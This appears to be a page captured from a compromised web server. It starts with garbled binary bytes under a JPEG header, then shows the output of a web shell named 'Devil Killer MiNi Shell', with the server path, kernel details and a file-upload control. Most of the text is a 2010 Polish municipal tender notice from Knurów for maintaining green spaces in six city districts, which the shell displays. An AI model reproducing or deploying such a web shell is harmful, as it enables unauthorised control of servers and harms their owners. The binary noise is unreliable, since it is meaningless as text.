JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100315/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100315/56091-N-2010.html

<p class="kh_header"><b>Knurów: Usługa kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów</b><br>
<b>Numer ogłoszenia: 56091 - 2010; data zamieszczenia: 15.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 032 3392308, faks 032 2351521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje wykonanie usług kompleksowego utrzymania i konserwacji terenów zielonych z podziałem miasta na 6 rejonów:
1.1. Rejon nr 1 o pow.11,00 ha,  w  tym : 
a) Plac 700-lecia przy ul. Al. Lipowej
b) Zieleń pom. ul. Al. Lipową, Kapelanów Wojskowych, MSP nr 7 i MSP nr 9
c) Zieleń wzdłuż ciągów pieszych:
 -ul. Witosa
 -ul. Lotników-Sikorskiego
 -WP I-WP II 
d) Zieleń przy ul. Piłsudczyków i Dyw. Kościuszkowskiej
e) Zieleń wzdłuż ul.1 Maja
f) Zieleń pomiędzy ul.1 Maja-Marynarzy
g) Ciąg zieleni wzdłuż ul. 26 Stycznia
Zakres usług: 
-koszenie trawników - 4-ro krotne pow.	- 40.000 m2 
-koszenie trawników - 5-cio krotne pow. 	- 65.066 m2
-pielęgnacja żywopłotu miękkiego 3 razy 	- 1640 m2
-wiosenne wygrabienie trawników z zanieczyszczeń, 
i wywóz odpadów na zorganizowane wysypisko 	- 65.066 m2
-jesienne grabienie liści i wywóz j.w.
(bez placu 700-lecia ) 	- 65.066 m2 
-pielęgnacja drzew piennych (łącznie z kontrolą 
i wymianą wiązadeł oraz uszkodzonych lub
brakujących palików) 	- 44 szt 
-pielęgnacja drzew i krzewów iglastych 	- 26 szt
-opryski iglaków (świerków) przeciwko przędziorkowi 	- 26 szt 
-opryski iglaków (świerków) przeciwko mszycy świerkowej 	- 26 szt 
-odmłodzenie krzewów o średnicy pow. 2m -3 razy 	- 5 szt
-odmłodzenie krzewów o średnicy do 2m -3 razy 	- 5 szt
-pielęgnacja krzewinek 	- 10 szt 
-pielęgnacja krzewów  liściastych 	- 110 m2
-pielęgnacja krzewów żywopłotowych 	- 135 szt
-usuwanie odrostów  przy i z drzew 	- 12 szt
-oczyszczenie i odchwaszczenie chodnika 	- 370 m2
-bieżące utrzymanie terenu  (łącznie z ciągami pieszymi) 	- 110.000 m2
-malowanie ławek 	- 15 szt
-naprawa ławek, uzupełnienie  siedzisk , oparć  
i dybli (deski sosnowe) 	- 10 szt kpl. 
1.2. Rejon Nr 2 o pow. 6,80 ha,  w tym : 
a) Zieleń w ul. Szpitalnej
b) Zieleń  wzdłuż ul.1 Maja (skarpa)
c) Zieleń wzdłuż ul. Kosmonautów i Szpitalnej do Ziętka
d) Teren pomiędzy ul. Kosmonautów 1-11
e) Zieleń i plac zabaw przy ul. Armii  Krajowej
f) Zieleń wzdłuż ul. Szpitalnej (od Ziętka do stacji kontroli)
g) Zieleń od ul. Szpitalnej do Sikorskiego
h) Zieleń wzdłuż ul. Ułanów i MSP Nr 9
i) Teren zielony (oczko)
j) Teren przy ul. Jedności Narodowej      
Zakres usług:
-koszenie trawników - 5-cio krotne pow. 	- 57.789 m2 
-odmłodzenie  żywopłotu miękkiego 3 razy 	- 1.410 m2 
-odmłodzenie krzewów o średnicy do 2m - 3 razy 	- 63 szt
-wiosenne wygrabienie trawników,wywóz 
 zanieczyszczeń na zorganizowane wysypisko 	- 57.789 m2 
-pielęgnacja drzew  (łącznie z kontrolą 
 i wymianą wiązadeł oraz uszkodzonych lub 
 brakujących palików) 	- 139 szt 
-pielęgnacja krzewów iglastych 	- 90 szt
-opryski iglaków (świerków) przeciwko przędziorkowi 	- 152 szt 
-opryski iglaków (świerków) przeciwko mszycy świerkowej 	- 152 szt 
-usunięcie dolnych gałęzi świerków (starych) od ul. Ułanów
 do wysokości 40-50 cm 	- 83 szt
-jesienne grabienie liści i wywóz na 
 zorganizowane wysypisko 	- 57.789 m2
-bieżące utrzymanie czystości terenu łącznie z parkingiem, 
 ciągami pieszymi, chodnikami, placem wypoczynkowym 	- 68.000 m2
-oczyszczanie nawierzchni piaskowych na placach zabaw 	- 905 m2
-oczyszczanie chodnika dookoła placu piaskowego z piasku 	- 187,4 m2
-odchwaszczenie ścieżki żwirowej- 2 razy 	- 156 m2
-odchwaszczenie ciągów pieszych, ścieżek 
 i placu wypoczynkowego 	- 8161 m2
-pielęgnacja kwietnika obsadzonego krzewinkami 	- 34 m2      
-pielęgnacja krzewów liściastych wzdłuż hydroforowni 	- 165 szt 
-pielęgnacja róż 	- 464 szt
-pielęgnacja tawuł (krzewów liściastych) 	- 454 szt
-dowóz i uzupełnienie ziemią urodzajną (kompostową)
 kwietnika obsadzonego różami 	- 18 m3    
-malowanie ławek 	- 35 szt
-mycie ławek  z PCV 	- 16 szt                                                      
-naprawa ławek,uzupełnianie 
 siedzisk lub oparć (deski sosnowe) 	- 10 szt
-demontaż podstaw betonowych ławki 	- 2 szt.
1.3. Rejon Nr 3 o pow. 3,60 ha,  w tym : 
a) Zieleń  przy ul.1 Maja 
b) Place zabaw przy ul. Mieszka I i Chrobrego 
c) Zieleń wzdłuż ul. K. Wielkiego i St. Batorego
d) Ciąg ul. Mieszka I i Mieszka I boczne
e) Zieleń pomiędzy ul. St. Batorego i Kosmonautów
f) Zieleń przed budynkiem K. Wielkiego 2  
i  trawnik  wzdłuż parkingu targowiska
g) Zieleń na os. Redyna
h) Zieleń w ul. Szpitalnej i Floriana 
i) Teren przy przepompowni ul. Wilsona i Wilsona 15
Zakres usług:
-koszenie trawników - 5-cio krotne pow. 	- 32.200 m2 
-odmłodzenie żywopłotu miękkiego 3 razy 	- 2610 m2 
-odmłodzenie krzewów o średnicy do 2m - 3 razy 	- 20 szt
-odmłodzenie krzewów o średnicy pow. 2m - 3 razy 	- 39 szt
-wiosenne wygrabienie trawników, wywóz
 zanieczyszczeń na zorganizowane wysypisko 	- 32.200 m2     
-pielęgnacja drzew (łącznie z kontrolą i wymianą wiązadeł 
 oraz uszkodzonych lub brakujących palików) 	- 48 szt 
-pielęgnacja drzew i krzewów iglastych 	- 33 szt
-opryski iglaków (świerków) przeciwko przędziorkowi 	- 24 szt
-opryski iglaków (świerków) przeciwko mszycy świerkowej 	- 24 szt
-jesienne grabienie liści i wywóz na zorganizowane wysypisko 	- 32.200 m2
-usuwanie odrostów przy i z drzew niezależnie od grubości drzewa - 39 szt
-bieżące utrzymanie  terenu 	- 35.800 m2
-zamiatanie naw. płytek wokół piaskownicy 1 raz w tyg.
 na placu zabaw ul. Chrobrego w m-cu maju 	- 50 m2 
-pielęgnacja krzewów liściastych 	- 105 szt 
-malowanie ławek 	- 45 szt
-naprawa ławek, uzupełnianie siedzisk lub oparć (deski sosnowe) 	- 30 szt
-oczyszczenie pow. przykrawężnikowych boiska na szer. 20cm 	- 138 mb
-zamiatanie zatok,chodników,alejek zatok parkingowych  
 z wywozem i utylizacją odpadów 1 raz w tyg. w okresie V-XI 	- 2335 m2
-zamiatanie boiska w okresie V-XI 2 razy w tygodniu 	- 1080 m2
1.4. Rejon Nr 4 o pow. 5,40 ha, w tym: 
a) Park przy ul. Ogana
b) Zieleń  przy ul. Dworcowej 2-10
c) Zieleń pomiędzy ul.1 Maja-Klasztorną
d) Zieleń pomiędzy ul. Klasztorną -Koziełka
e) Zieleń przy ul. Wilsona 3-5 
Zakres usług:
-koszenie trawników 5-cio krotne pow. 	- 49.520 m2 
-odmłodzenie  żywopłotu miękkiego 3 razy 	- 1620 m2 
-odmłodzenie krzewów o śr. korony do 2 m - 3 razy 	- 188 szt
-pielęgnacja róż 	- 140 szt
-pielęgnacja drzew piennych (łącznie z kontrolą 
 i wymianą wiązadeł oraz uszkodzonych 
 lub brakujących palików) 	- 55 szt 
-pielęgnacja drzew f. naturalnej 	- 25 szt
-pielęgnacja drzew iglastych 	- 8 szt
-opryski iglaków (świerków) przeciwko przędziorkowi 	- 8 szt
-opryski iglaków (świerków) przeciwko mszycy świerkowej 	- 8 szt
-usuwanie odrostów przy i z drzew niezależnie od grubości drzewa - 20 szt 
-wiosenne wygrabienie trawników i  wywóz 
 zanieczyszczeń na zorganizowane wysypisko 	- 49.520 m2
-jesienne grabienie liści i wywóz j.w. 	- 49.520 m2
-bieżące utrzymanie terenu 	- 54.100 m2
-czyszczenie ścieku odwadniającego 	- 150 mb
-oczyszczenie nawierzchni ciągów pieszych z ziemi, odkrycie obrzeży - 2170 m2 
-zamiatanie chodników, ciągów pieszych i schodów 	- 4486 m2 
-malowanie ławek 	- 56 szt
-naprawa ławek, uzupełnianie siedzisk lub oparć i dybli (deski sosnowe) - 40 szt kpl.
-demontaż ławek 	- 7 szt 
1.5. Rejon Nr 5 o pow. 2,40 ha, w tym: 
a) Zieleńce w ul. Dworcowej
b) Zieleniec i ciąg zieleni przy ul. Niepodległości 
c) Zieleniec przy ul. Dworcowej-Kopalnianej
d) Skwer przy ul. Plac Powstańców Śląskich
e) Nieczynny cmentarz  przy ul. Koziełka
Zakres usług:
-koszenie trawników - 6-ro krotne pow. 	- 13.373 m2 
-odmłodzenie  żywopłotu miękkiego 3 razy 	- 150 m2 
-odmłodzenie krzewów o śr. korony do 2m - 3 razy 	- 3 szt
-pielęgnacja róż 	- 368 szt 
-oprysk róż na mszyce 	- 368 szt
-oprysk róż na choroby grzybowe 	- 368 szt
-jesienne wapnowanie róż 	- 368 szt
-pielęgnacja krzewów liściastych 	- 4232 szt 
-pielęgnacja różaneczników 	- 43 szt
-pielęgnacja drzew i krzewów iglastych 	- 218 szt
-pielęgnacja kwietników obsadzonych bylinami 	- 90 m2
-uzupełnienie ściółki z kory pod krzewami 	- 12 m3
-wiosenne wygrabienie trawników, wywóz
 zanieczyszczeń, na zorganizowane wysypisko 	- 13.373 m2  
-jesienne grabienie liści  i wywóz j/w 	- 13.373m2
-pielęgnacja drzew piennych i f. naturalnej
 (łącznie z kontrolą i wymianą wiązadeł oraz 
 uszkodzonych lub brakujących palików) 	- 76 szt 
-usuwanie odrostów przy i z drzew niezależnie od grubości drzewa - 81 szt 
-bieżące utrzymanie terenu 	- 23.906 m2
-zamiatanie alejek, placów, schodów, pochylni, 
 ciągów pieszych, chodników, nawierzchni z kostki 	- 7399 m2
-zamiatanie nawierzchni z płyt gumowych 	- 104 m2
-odchwaszczanie alejek, placów, schodów, ciągów 
 pieszych,chodników, nawierzchni z kostki  2 razy 	- 7399 m2 
-zakup i zabudowa krzyży drewnianych z tabliczkami 	- 3 szt
-malowanie ławek 	- 80 szt
-naprawa ławek, uzupełnianie 
 siedzisk, oparć i dybli (deski sosnowe) 	- 30 szt kpl.-
1.6. Rejon Nr 6 o pow. 9,20 ha, w tym: 
a) Zieleniec w ul. Michalskiego
b) Skwer przy ul. Staszica
c) Zieleń w ul. Al. Piastów
d) Teren przy ul. Sztygarskiej
e) Zieleniec przy ul. Lignozy
f) Skwer przy ul. Parkowej 
g) Park przy ul. Parkowej
Zakres usług:
-koszenie trawników - 5-cio krotne pow. 	- 73.800 m2 
-koszenie trawników - 6-cio krotne 	- 1.700 m2 
-odmłodzenie żywopłotu miękkiego 3 razy 	- 3.900 m2 
-odmłodzenie żywopłotu twardego 2 razy 	- 150 m2 
-odmłodzenie krzewów o śr. korony do 2m -3 razy 	- 12 szt
-odmłodzenie krzewów o śr. korony pow. 2m -3 razy 	- 10 szt 
-wiosenne wygrabienie trawników i wywóz 
 zanieczyszczeń na zorganizowane wysypisko 	- 38.900 m2  
-jesienne grabienie liści  i wywóz j.w.	- 57.572 m2
-jesienne wygrabienie liści wzdłuż alejek w parku NOT 
 na szerokości po 2 m długość alejek 945mb, zebranie
 i wywóz liści na zorganizowane składowisko 	- 3780 m2
-pielęgnacja drzew piennych i f. naturalnej
 (łącznie z kontrolą i wymianą wiązadeł oraz 
 uszkodzonych lub brakujących palików) 	- 16 szt 
-usuwanie odrostów przy i z drzew niezależnie od grubości drzewa - 80 szt                          
-przycięcie krzewów starszych 2 razy 	- 20 m2
-wykaszanie jednorocznych odrostów drzew 	- 350 m2
-zamiatanie nawierzchni z kostki i asfaltobetonowej 	- 8895 m2
-bieżące utrzymanie terenu 	- 92.184 m2
-oczyszczanie nawierzchni żwirowej i piaskowej placu zabaw 	- 520 m2
-malowanie ławek 	- 77 szt
-naprawa ławek, uzupełnianie siedzisk, oparć i dybli (deski sosnowe) - 35 szt kpl.
2. Przedmiot zamówienia został szczegółowo określony w następujących załącznikach do projektów umów dotyczących poszczególnych rejonów: 
2.1. załącznik nr 2 - Wykaz obiektów zieleni z charakterystyką ogólną dla danego rejonu,
2.2. załącznik nr 3 - Harmonogram usług dla danego rejonu,
2.3. załącznik nr 4 - Przedmiar usług dla danego rejonu,
2.4. załącznik nr 5 - Wytyczne wykonania i odbioru usług związanych z konserwacją
i utrzymaniem terenów zieleni miejskiej dla danego rejonu.
Zamawiający dopuszcza możliwość składania ofert częściowych. Wykonawca może złożyć ofertę maksymalnie na 2 wybrane rejony.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 pzp realizatorowi zamówienia, zgodnych z przedmiotem zamówienia podstawowego i stanowiących nie więcej niż 20% jego wartości.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6, 77.31.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania w wykazie usług minimum 2 usług obejmujących pielęgnację zieleni, o wartości brutto minimum 50.000,00 zł każda, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i doświadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wskazania w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia osoby na stanowisko kierownika prac - posiadającej minimum średnie wykształcenie: ogrodnicze, kształtowania terenów zielonych, leśne lub rolnicze.  
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował osobami zdolnymi do wykonania zamówienia niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania się posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 50.000,00 zł.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt III.4.3.1, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
